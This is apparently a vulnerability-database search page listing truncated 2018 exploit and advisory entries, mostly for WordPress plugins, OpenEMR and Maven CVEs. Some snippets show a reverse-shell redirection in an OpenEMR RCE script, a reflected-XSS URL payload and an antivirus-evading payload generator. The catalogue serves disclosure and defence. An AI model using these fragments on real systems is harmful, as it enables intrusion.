Lucene search

1622 matches found

0day.today
added 2019/01/02 12:0 a.m. | 19 views

WordPress Adicon Server 1.2 Plugin - selectedPlace SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection Software Link: https://wordpress.org/plugins/adicons/ Exploit Author: Kaimi Website: https://kaimi.io Version: 1.2 Category: webapps SQL Injection File:...

0.3 AI score
Exploits: 0
0day.today
added 2018/12/27 12:0 a.m. | 62 views

WordPress Audio Record 1.0 Plugin - Arbitrary File Upload Vulnerability

Exploit for php platform in category web applications Exploit Title: WordPress Plugin Audio Record 1.0 - Arbitrary File Upload Software Link: https://wordpress.org/plugins/audio-record/ Exploit Author: Kaimi Website: https://kaimi.io Version: 1.0 Category: webapps Unrestricted file upload in reco...

0.3 AI score
Exploits: 0
Packet Storm
added 2018/12/22 12:0 a.m. | 43 views

WordPress Cvp-Adegrontec 4.8.3 Shell Upload

Exploit Title : WordPress Cvp-Adegrontec Themes 4.8.3 Remote Shell Upload Vulnerability Author Discovered By : KingSkrupellos from Cyberizm Digital Security Army Date : 22/12/2018 Vendor Homepage : wordpress.org Software Download Link : N/A Tested On : Windows and Linux Category : WebApps Version...

7.4 AI score
Exploits: 0
vulnersOsv
added 2018/12/20 10:1 p.m. | 1 views

ai.foremast.metrics:foremast-spring-boot-k8s-metrics-starter (>=0.1.2 <=0.1.6), cn.aghost:nacos-address (>=1.2.1.aghost-fix.20201109 <=1.2.1.aghost-fix.20210122) +408 more potentially affected by CVE-2018-15801 via org.springframework.security:spring-security-core (>=5.1.0.RELEASE <=5.1.1.RELEASE)

org.springframework.security:spring-security-core MAVEN version =5.1.0.RELEASE, =0.1.2, =1.2.1.aghost-fix.20201109, =1.2.1.aghost-fix.20201109, =1.2.1.aghost-fix.20201109, =1.2.1.aghost-fix.20201109, =1.2.1.aghost-fix.20201109, =1.2.1.aghost-fix.20201109, =1.2.1.aghost-fix.20201109,...

7.4 CVSS | 6.1 AI score | 0.00124 EPSS
Exploits: 0
0day.today
added 2018/12/19 12:0 a.m. | 25 views

Yeswiki Cercopitheque - id SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: SQL Injection in Yeswiki Cercopitheque Exploit Author: Mickael BROUTY @ark1nar - FIDENS Vendor Homepage: https://yeswiki.net Software Link: https://repository.yeswiki.net/cercopitheque/yeswiki-cercopitheque-2018-12-07-1.zip...

7.1 AI score | 0.02643 EPSS
Exploits: 5
Packet Storm
added 2018/12/06 12:0 a.m. | 171 views

WordPress newwpml 3.0 Database Disclosure

Exploit Title : WordPress newwpml Plugins 3.0 Database Backup Disclosure Author Discovered By : KingSkrupellos from Cyberizm Digital Security Army Date : 06/12/2018 Vendor Homepage : wordpress.org Software Download Link : N/A Tested On : Windows and Linux Category : WebApps Version Information :...

7.4 AI score
Exploits: 0
Kitploit
added 2018/12/05 11:37 a.m. | 66 views

Veil - Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions. Veil is current under support by @ChrisTruncer Software Requirements: The following OSs are officially supported: Debian 8+ Kali Linux Rolling 2018.1+ The following OSs are likely able to run Veil: Ar...

7.4 AI score
Exploits: 0 | References: 1
Packet Storm
added 2018/11/29 12:0 a.m. | 81 views

WordPress Jazzy Forms 1.1.1 Database Backup Disclosure

Exploit Title : WordPress jazzy-forms Plugins 1.1.1 Database Backup Information Disclosure Vulnerability Author Discovered By : KingSkrupellos from Cyberizm Digital Security Army Date : 30/11/2018 Vendor Homepage : wordpress.org/plugins/jazzy-forms/ Software Download Link :...

7.4 AI score
Exploits: 0
Kitploit
added 2018/11/16 12:45 p.m. | 96 views

CloudBunny - A Tool To Capture The Real IP Of The Server That Uses A WAF As A Proxy Or Protection

CloudBunny is a tool to capture the real IP of the server that uses a WAF as a proxy or protection. How works In this tool we used three search engines to search domain information: Shodan, Censys and Zoomeye. To use the tools you need the API Keys, you can pick up the following links: Shodan -...

7.1 AI score
Exploits: 0 | References: 1
Hacker One
added 2018/11/13 12:17 p.m. | 14 views

Shopify: Stored XSS on demo app link

Hi, I found stored XSS in apps.shopify.com in the DEMO URL of the apps you create. POC 1. go to your partner account and create a new app 2. go to DEMO link in https://apps.shopify.com/services/appsubmissions/edit of your app put the payload you see below: F374863 and when pressing on preview...

Exploits: 0
OSV
added 2018/11/07 7:29 p.m. | 3 views

CVE-2018-19093

An issue has been found in libIEC61850 v1.3. It is a SEGV in ControlObjectClientsetCommandTerminationHandler in client/clientcontrol.c. NOTE: the software maintainer disputes this because it requires incorrect usage of the clientexamplecontrol program...

7.5 CVSS | 6.8 AI score
Exploits: 0 | References: 2
vulnersOsv
added 2018/10/16 11:12 p.m. | 3 views

org.apache.camel:camel-atmosphere-websocket (=2.16.0), org.apache.camel:camel-example-cxf-tomcat (=2.16.0) +8 more potentially affected by CVE-2015-5348 via org.apache.camel:camel-servlet (=2.16.0)

org.apache.camel:camel-servlet MAVEN version =2.16.0 is affected by a known vulnerability. The following packages have a transitive dependency on org.apache.camel:camel-servlet and may be impacted: - org.apache.camel:camel-atmosphere-websocket =2.16.0 - org.apache.camel:camel-example-cxf-tomcat...

8.1 CVSS | 7.2 AI score | 0.06832 EPSS
Exploits: 0
vulnersOsv
added 2018/10/16 11:12 p.m. | 1 views

org.apache.camel:camel-example-cxf-proxy (=2.16.0), org.apache.camel:camel-sap-netweaver (=2.16.0) potentially affected by CVE-2015-5348 via org.apache.camel:camel-http (=2.16.0)

org.apache.camel:camel-http MAVEN version =2.16.0 is affected by a known vulnerability. The following packages have a transitive dependency on org.apache.camel:camel-http and may be impacted: - org.apache.camel:camel-example-cxf-proxy =2.16.0 - org.apache.camel:camel-sap-netweaver =2.16.0 Source...

8.1 CVSS | 7.2 AI score | 0.06832 EPSS
Exploits: 0
vulnersOsv
added 2018/10/16 11:7 p.m. | 0 views

org.apache.camel:camel-mail-starter (=2.22.0), org.nhind:direct-msg-monitor (>=6.0 <=8.1.0) +3 more potentially affected by CVE-2018-8041 via org.apache.camel:camel-mail (=2.22.0)

org.apache.camel:camel-mail MAVEN version =2.22.0 is affected by a known vulnerability. The following packages have a transitive dependency on org.apache.camel:camel-mail and may be impacted: - org.apache.camel:camel-mail-starter =2.22.0 - org.nhind:direct-msg-monitor =6.0, =6.0, =6.0, =8.1.0 -...

5.3 CVSS | 6.4 AI score | 0.02474 EPSS
Exploits: 0
vulnersOsv
added 2018/10/16 11:7 p.m. | 0 views

org.apache.camel:camel-mail-starter (>=2.21.0 <=2.21.1), org.wildfly.camel.example:example-camel-mail (=6.0.0) potentially affected by CVE-2018-8041 via org.apache.camel:camel-mail (>=2.21.0 <=2.21.1)

org.apache.camel:camel-mail MAVEN version =2.21.0, =2.21.0, =2.21.1 - org.wildfly.camel.example:example-camel-mail =6.0.0 Source cves: CVE-2018-8041 Source advisory: OSV:GHSA-JV74-F9PJ-XP3F...

5.3 CVSS | 6.4 AI score | 0.02474 EPSS
Exploits: 0
wpexploit
added 2018/09/06 12:0 a.m. | 15 views

File Manager < 3.0 - Authenticated Reflected Cross-Site Scripting (XSS)

Lack of sanitisation in the lang parameter in the admin dashboard could allow attacker to perform reflected XSS attacks against logged in administrators https://example.com/wp-admin/admin.php?page=wpfilemanager&lang=zhCNalertXSS...

3.5 CVSS | 2.2 AI score | 0.00405 EPSS
Exploits: 2 | References: 3
exploitpack
added 2018/08/30 12:0 a.m. | 13 views

WordPress Plugin Quizlord 2.0 - Cross-Site Scripting

WordPress Plugin Quizlord 2.0 - Cross-Site Scripting Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting Date: 2018-08-29 Exploit Author: Renos Nikolaou Software Link: https://downloads.wordpress.org/plugin/quizlord.zip Version: 2.0 Tested on: Kali Linux CVE: N/A Description :...

Exploits: 0
seebug.org
added 2018/08/08 12:0 a.m. | 605 views

OpenEMR < 5.0.1 - Remote Code Execution

Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example: http://127.0.0.1/openemr." ap.addargument"-u", "--user",...

Exploits: 0
exploitpack
added 2018/08/07 12:0 a.m. | 52 views

OpenEMR 5.0.1 - (Authenticated) Remote Code Execution

OpenEMR 5.0.1 - Authenticated Remote Code Execution Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example:...

0.5 AI score
Exploits: 0
OSV
added 2018/08/06 9:33 p.m. | 23 views

GHSA-72FG-JQHX-C68P Open Redirect in st

st is a module for serving static files. An attacker is able to craft a request that results in an HTTP 301 redirect to an entirely different domain. A request for: http://some.server.com//nodesecurity.org/%2e%2e would result in a 301 to //nodesecurity.org/%2e%2e which most browsers treat as a...

6.1 CVSS | 6.2 AI score | 0.00215 EPSS
Exploits: 1 | References: 3